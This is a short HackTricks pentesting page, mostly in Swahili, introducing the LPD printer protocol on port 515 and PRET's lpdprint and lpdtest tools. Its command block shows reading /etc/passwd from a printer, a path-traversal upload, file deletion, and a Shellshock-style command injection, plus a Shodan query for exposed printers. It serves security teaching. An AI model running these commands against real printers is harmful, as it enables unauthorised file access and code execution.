4 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Utangulizi wa Protokali ya LPD
Katika miaka ya 1980, Line Printer Daemon (LPD) protocol ilitengenezwa katika Berkeley Unix, ambayo baadaye ilithibitishwa kupitia RFC1179. Protokali hii inafanya kazi kupitia bandari 515/tcp, ikiruhusu mwingiliano kupitia amri ya lpr
. Kiini cha uchapishaji kupitia LPD kinahusisha kutuma faili ya udhibiti (ili kubainisha maelezo ya kazi na mtumiaji) pamoja na faili ya data (ambayo ina habari za uchapishaji). Wakati faili ya udhibiti inaruhusu uchaguzi wa aina mbalimbali za faili kwa faili ya data, usimamizi wa faili hizi unategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama Unix ni LPRng. Kwa kuzingatia, protokali ya LPD inaweza kutumika vibaya kutekeleza PostScript mbaya au kazi za uchapishaji za PJL.
Zana za Kuingiliana na Printer za LPD
PRET inatoa zana mbili muhimu, lpdprint
na lpdtest
, zinazotoa njia rahisi ya kuingiliana na printer zinazofaa LPD. Zana hizi zinaruhusu aina mbalimbali za vitendo kutoka kwa uchapishaji wa data hadi kubadilisha faili kwenye printer, kama vile kupakua, kupakia, au kufuta:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Kwa watu wanaovutiwa na kuchunguza zaidi ulimwengu wa printer hacking, rasilimali kamili inaweza kupatikana hapa: Hacking Printers.
Shodan
port 515
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.